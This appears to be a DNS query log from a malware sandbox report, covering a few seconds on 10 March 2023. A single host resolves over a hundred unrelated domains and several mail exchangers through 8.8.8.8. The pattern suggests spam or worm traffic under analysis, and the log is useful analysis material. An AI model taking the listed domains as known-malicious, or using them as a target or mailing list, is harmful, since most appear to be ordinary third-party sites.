                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.192929983 CET8.8.8.8192.168.2.60x7e8dName error (3)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.221498013 CET8.8.8.8192.168.2.60x720cNo error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.250375986 CET8.8.8.8192.168.2.60xe110No error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.278796911 CET8.8.8.8192.168.2.60x9cfNo error (0)kevyt.net104.21.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.278796911 CET8.8.8.8192.168.2.60x9cfNo error (0)kevyt.net172.67.129.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.281476021 CET8.8.8.8192.168.2.60xc37eNo error (0)ruzee.com207.180.198.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.392560959 CET8.8.8.8192.168.2.60xc67aNo error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.407438993 CET8.8.8.8192.168.2.60xbdf5No error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.441006899 CET8.8.8.8192.168.2.60xdb44No error (0)metaforacom.com185.42.105.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.446721077 CET8.8.8.8192.168.2.60xa638No error (0)techtrans.de185.237.66.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.472352028 CET8.8.8.8192.168.2.60x88d2No error (0)muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.510333061 CET8.8.8.8192.168.2.60x4124No error (0)insia.com82.208.6.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.527653933 CET8.8.8.8192.168.2.60x7b32No error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.540399075 CET8.8.8.8192.168.2.60x676fNo error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.804461002 CET8.8.8.8192.168.2.60x464No error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.008481979 CET8.8.8.8192.168.2.60xf7c8No error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.008481979 CET8.8.8.8192.168.2.60xf7c8No error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.008481979 CET8.8.8.8192.168.2.60xf7c8No error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.008481979 CET8.8.8.8192.168.2.60xf7c8No error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.041611910 CET8.8.8.8192.168.2.60x2860No error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.076457977 CET8.8.8.8192.168.2.60xa7e4No error (0)pleszew.policja.gov.pl91.229.22.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.112087011 CET8.8.8.8192.168.2.60xea81No error (0)diamir.de138.201.65.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.245613098 CET8.8.8.8192.168.2.60xf8fNo error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.316421986 CET8.8.8.8192.168.2.60x2159No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.319938898 CET8.8.8.8192.168.2.60x18ebNo error (0)zugseil.com92.42.191.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.321194887 CET8.8.8.8192.168.2.60x266fNo error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.325562954 CET8.8.8.8192.168.2.60x5835No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.325562954 CET8.8.8.8192.168.2.60x5835No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.329835892 CET8.8.8.8192.168.2.60xbcc1No error (0)burstner.ru52.50.65.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.336633921 CET8.8.8.8192.168.2.60xd557No error (0)www.muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.357909918 CET8.8.8.8192.168.2.60xaf50No error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.421145916 CET8.8.8.8192.168.2.60xc794No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.536103010 CET8.8.8.8192.168.2.60x57f7No error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.553033113 CET8.8.8.8192.168.2.60xb936Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.665298939 CET8.8.8.8192.168.2.60x8515No error (0)sinwal.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.665298939 CET8.8.8.8192.168.2.60x8515No error (0)sinwal.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.691551924 CET8.8.8.8192.168.2.60x1e3cNo error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.691551924 CET8.8.8.8192.168.2.60x1e3cNo error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.691551924 CET8.8.8.8192.168.2.60x1e3cNo error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.712292910 CET8.8.8.8192.168.2.60xbeabNo error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.724028111 CET8.8.8.8192.168.2.60xa632No error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.724028111 CET8.8.8.8192.168.2.60xa632No error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.731564999 CET8.8.8.8192.168.2.60x8d09No error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.738329887 CET8.8.8.8192.168.2.60x8db1No error (0)zugseil.com92.42.191.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.785336018 CET8.8.8.8192.168.2.60x5405No error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.796287060 CET8.8.8.8192.168.2.60xdb44No error (0)metaforacom.com185.42.105.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.902004957 CET8.8.8.8192.168.2.60xb092No error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.938996077 CET8.8.8.8192.168.2.60xbc2aNo error (0)muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.972229004 CET8.8.8.8192.168.2.60x1a7bNo error (0)semuk.com52.128.23.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.981287003 CET8.8.8.8192.168.2.60x7f95No error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.981287003 CET8.8.8.8192.168.2.60x7f95No error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.989557981 CET8.8.8.8192.168.2.60x3ed1No error (0)cutchie.com199.59.243.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.046322107 CET8.8.8.8192.168.2.60xedc9No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.089834929 CET8.8.8.8192.168.2.60x7dabNo error (0)coxkitchensandbaths.com205.149.134.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.183897972 CET8.8.8.8192.168.2.60x45e1No error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.189856052 CET8.8.8.8192.168.2.60x228aNo error (0)alt4.gmail-smtp-in.l.google.com142.250.157.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.211329937 CET8.8.8.8192.168.2.60x293eNo error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.226948023 CET8.8.8.8192.168.2.60x6e38No error (0)wahw.com.au54.194.190.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.308667898 CET8.8.8.8192.168.2.60xf3c7No error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.320651054 CET8.8.8.8192.168.2.60xdd37No error (0)eos-i.commacx1980.qy56.supcname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.320651054 CET8.8.8.8192.168.2.60xdd37No error (0)macx1980.qy56.supcname.commfddos.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.320651054 CET8.8.8.8192.168.2.60xdd37No error (0)mfddos.datacname.com15.204.18.132.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.320651054 CET8.8.8.8192.168.2.60xdd37No error (0)15.204.18.132.datacname.com15.204.18.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.370745897 CET8.8.8.8192.168.2.60x59e6No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.384098053 CET8.8.8.8192.168.2.60x1683No error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.490658045 CET8.8.8.8192.168.2.60xf59bNo error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.560316086 CET8.8.8.8192.168.2.60xec67Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.572061062 CET8.8.8.8192.168.2.60x59feNo error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.573797941 CET8.8.8.8192.168.2.60xe619No error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.573797941 CET8.8.8.8192.168.2.60xe619No error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.573797941 CET8.8.8.8192.168.2.60xe619No error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.573797941 CET8.8.8.8192.168.2.60xe619No error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.671400070 CET8.8.8.8192.168.2.60x7d72No error (0)gmail-smtp-in.l.google.com142.250.27.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.861924887 CET8.8.8.8192.168.2.60x1ddeNo error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.916800022 CET8.8.8.8192.168.2.60x4c96No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.916800022 CET8.8.8.8192.168.2.60x4c96No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.921267033 CET8.8.8.8192.168.2.60xb999No error (0)dayvo.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.921267033 CET8.8.8.8192.168.2.60xb999No error (0)dayvo.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.925076008 CET8.8.8.8192.168.2.60x4328No error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.942261934 CET8.8.8.8192.168.2.60xc995Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.095695972 CET8.8.8.8192.168.2.60x8cfcNo error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.192318916 CET8.8.8.8192.168.2.60x189eNo error (0)cpmteam.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.192318916 CET8.8.8.8192.168.2.60x189eNo error (0)cpmteam.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.199389935 CET8.8.8.8192.168.2.60x42beName error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.279690027 CET8.8.8.8192.168.2.60xcbfdNo error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.285173893 CET8.8.8.8192.168.2.60x91c8Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.289652109 CET8.8.8.8192.168.2.60x28d8No error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.336971998 CET8.8.8.8192.168.2.60xc38bName error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.345777035 CET8.8.8.8192.168.2.60xcd98No error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.356838942 CET8.8.8.8192.168.2.60xe4c9No error (0)arowines.com104.164.117.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.359321117 CET8.8.8.8192.168.2.60x24dNo error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.360178947 CET8.8.8.8192.168.2.60xd0c0No error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.378292084 CET8.8.8.8192.168.2.60xed30No error (0)shesfit.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.378292084 CET8.8.8.8192.168.2.60xed30No error (0)shesfit.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.380137920 CET8.8.8.8192.168.2.60x4fedNo error (0)zugseil.com92.42.191.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.391024113 CET8.8.8.8192.168.2.60x6809No error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.391024113 CET8.8.8.8192.168.2.60x6809No error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.393992901 CET8.8.8.8192.168.2.60xbeb1No error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.393992901 CET8.8.8.8192.168.2.60xbeb1No error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.395523071 CET8.8.8.8192.168.2.60xf54cNo error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.397567987 CET8.8.8.8192.168.2.60xa652No error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.399646044 CET8.8.8.8192.168.2.60x857aNo error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.399646044 CET8.8.8.8192.168.2.60x857aNo error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.415385962 CET8.8.8.8192.168.2.60x50a4No error (0)univi.it18.197.121.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.432064056 CET8.8.8.8192.168.2.60xb1e8Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.475235939 CET8.8.8.8192.168.2.60x292cNo error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.475235939 CET8.8.8.8192.168.2.60x292cNo error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.491913080 CET8.8.8.8192.168.2.60x1bd6Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.518558979 CET8.8.8.8192.168.2.60xdeeaNo error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.520270109 CET8.8.8.8192.168.2.60x1863No error (0)in1.smtp.messaginguser.com66.111.4.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.520270109 CET8.8.8.8192.168.2.60x1863No error (0)in1.smtp.messaginguser.com66.111.4.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.520270109 CET8.8.8.8192.168.2.60x1863No error (0)in1.smtp.messaginguser.com66.111.4.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.520270109 CET8.8.8.8192.168.2.60x1863No error (0)in1.smtp.messaginguser.com66.111.4.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.520270109 CET8.8.8.8192.168.2.60x1863No error (0)in1.smtp.messaginguser.com66.111.4.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.520270109 CET8.8.8.8192.168.2.60x1863No error (0)in1.smtp.messaginguser.com66.111.4.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.524238110 CET8.8.8.8192.168.2.60x3efaNo error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.714071989 CET8.8.8.8192.168.2.60x4c41Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.760175943 CET8.8.8.8192.168.2.60xe2b1No error (0)dhh.la.gov52.200.51.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.764609098 CET8.8.8.8192.168.2.60x70a8No error (0)mackusick.com217.160.0.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.784849882 CET8.8.8.8192.168.2.60x8928No error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.946860075 CET8.8.8.8192.168.2.60x7accNo error (0)acraloc.com192.64.150.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.966097116 CET8.8.8.8192.168.2.60x7b0dNo error (0)bount.com.tw188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.966097116 CET8.8.8.8192.168.2.60x7b0dNo error (0)bount.com.tw188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.971343994 CET8.8.8.8192.168.2.60x6c1bNo error (0)unicus.jp49.212.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.986663103 CET8.8.8.8192.168.2.60x27e7Name error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.039978027 CET8.8.8.8192.168.2.60xe4d2No error (0)biosolve.com151.101.130.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.052660942 CET8.8.8.8192.168.2.60xde43No error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.079570055 CET8.8.8.8192.168.2.60x5d1bNo error (0)indonesiamedia.com74.208.215.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.175970078 CET8.8.8.8192.168.2.60x9069No error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.175970078 CET8.8.8.8192.168.2.60x9069No error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.175970078 CET8.8.8.8192.168.2.60x9069No error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.189732075 CET8.8.8.8192.168.2.60xb6beNo error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.189732075 CET8.8.8.8192.168.2.60xb6beNo error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.189732075 CET8.8.8.8192.168.2.60xb6beNo error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.189732075 CET8.8.8.8192.168.2.60xb6beNo error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.209471941 CET8.8.8.8192.168.2.60xef59No error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.219906092 CET8.8.8.8192.168.2.60x6113No error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.263530970 CET8.8.8.8192.168.2.60xcf55No error (0)tabbles.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.263530970 CET8.8.8.8192.168.2.60xcf55No error (0)tabbles.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.274943113 CET8.8.8.8192.168.2.60xfd2eNo error (0)onzcda.com35.186.238.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.298702955 CET8.8.8.8192.168.2.60x18abNo error (0)mjrcpas.com154.81.136.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.312130928 CET8.8.8.8192.168.2.60x1f78No error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.334865093 CET8.8.8.8192.168.2.60x75deNo error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.360248089 CET8.8.8.8192.168.2.60x3aa0Name error (3)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.376573086 CET8.8.8.8192.168.2.60x8b30No error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.474150896 CET8.8.8.8192.168.2.60xdbafNo error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.666059017 CET8.8.8.8192.168.2.60xf8f0Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.667143106 CET8.8.8.8192.168.2.60xaf0eNo error (0)plaske.ua52.211.245.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.694922924 CET8.8.8.8192.168.2.60xd1e3No error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.743587971 CET8.8.8.8192.168.2.60x525dNo error (0)techtrans.de185.237.66.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.746978045 CET8.8.8.8192.168.2.60x9409No error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.756076097 CET8.8.8.8192.168.2.60xc13No error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.756076097 CET8.8.8.8192.168.2.60xc13No error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.756076097 CET8.8.8.8192.168.2.60xc13No error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.898046017 CET8.8.8.8192.168.2.60x4c41Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.170932055 CET8.8.8.8192.168.2.60x2e58No error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.182614088 CET8.8.8.8192.168.2.60x4aafNo error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.204035997 CET8.8.8.8192.168.2.60x83eNo error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.204035997 CET8.8.8.8192.168.2.60x83eNo error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.220386028 CET8.8.8.8192.168.2.60x361No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.261065006 CET8.8.8.8192.168.2.60xa0b6No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.395169973 CET8.8.8.8192.168.2.60x6f24No error (0)arowines.com104.164.117.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.484255075 CET8.8.8.8192.168.2.60xf3c3No error (0)revoldia.net45.200.235.135A (IP address)IN (0x0001)false
